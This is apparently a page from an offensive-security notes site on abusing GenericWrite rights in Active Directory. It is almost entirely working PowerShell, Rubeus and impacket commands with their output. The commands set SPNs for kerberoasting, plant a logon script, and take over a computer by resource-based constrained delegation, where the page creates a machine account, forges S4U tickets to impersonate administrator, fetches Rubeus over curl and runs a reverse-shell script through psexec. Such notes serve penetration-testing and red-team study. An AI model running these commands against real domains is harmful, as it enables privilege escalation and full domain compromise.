GenericWrite

User has GenericWrite over another user

To abuse GenericWrite, we have 2 options.

We can set a service principal name and we can kerberoast that account.
We can set objects like logon script which would get executed on the next time account logs in.

Setting SPN,

Import-Module .\Powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)

Set-DomainObject -Credential $Cred -Identity maria -SET @{serviceprincipalname='foobar/xd'}

or by simply,

setspn -a object.local/maria.object.local:1337 object.local\maria

Changing logon script,

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)

cd C:\\Windows\\System32\\spool\\drivers\\color
echo 'whoami > C:\\Windows\\System32\\spool\\drivers\\color\\poc.txt' > foo.ps1

Set-DomainObject -Credential $Cred -Identity maria -SET @{scriptpath='C:\\Windows\\System32\\spool\\drivers\\color\\foo.ps1'}

User / Computer has GenericWrite over computer

RBCD

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

PS C:\users\administrator\Desktop> . .\Powermad.ps1

PS C:\users\administrator\Desktop> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
PS C:\users\administrator\Desktop> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\users\administrator\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\users\administrator\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\users\administrator\Desktop> $SD.GetBinaryForm($SDBytes, 0)

PS C:\users\administrator\Desktop> Get-DomainComputer TARGET | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
VERBOSE: get-domain
VERBOSE: [Get-DomainSearcher] ...

PS C:\users\administrator\Desktop> curl 192.168.255.255/Rubeus.exe -o Rubeus.exe
PS C:\users\administrator\Desktop> .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:TARGET.ECORP.COM

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Calculate Password Hash(es)

[*] Input password             : Summer2018!
[*] Input username             : attackersystem
[*] Input domain               : ...
[*] Salt                       : ...
[*]       rc4_hmac             : <RC4_HMAC>
[*]       aes128_cts_hmac_sha1 : ...
[*]       aes256_cts_hmac_sha1 : ...
[*]       des_cbc_md5          : ...

PS C:\users\administrator\Desktop> .\Rubeus.exe s4u /user:attackersystem$ /rc4:<RC4_HMAC> /impersonateuser:administrator /msdsspn:cifs/TARGET.ECORP.COM /ptt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: S4U

[*] Using rc4_hmac hash: <RC4_HMAC>
[*] Building AS-REQ (w/ preauth) for: 'ECORP.COM\attackersystem$'
[*] Using domain controller: 255.255.255.255:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIF...

[*] Impersonating user 'administrator' to target SPN 'cifs/TARGET.ECORP.COM'
[*] Building S4U2proxy request for service: 'cifs/TARGET.ECORP.COM'
[*] Using domain controller: ...
[*] Sending S4U2proxy request to domain controller ....
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/TARGET.ECORP.COM':

x.ps1 has a reverse shell

c:\Users\Administrator\Desktop> .\psexec -s \\TARGET.ECORP.COM Powershell -ExecutionPolicy Bypass -File c:\users\administrator\desktop\x.ps1

or after setting up the domain object you can s4u2 proxy locally

net time set -S dc01.ecorp.local 
impacket-getST -spn cifs/dc01.ecorp.local ecorp/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip 192.168.xx.xx

#export the ticket and do psexec to access the DC

export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -target-ip 192.168.xx.xx dc01.ecorp.local

PreviousWriteDacl NextForceChangePassword

Last updated 3 years ago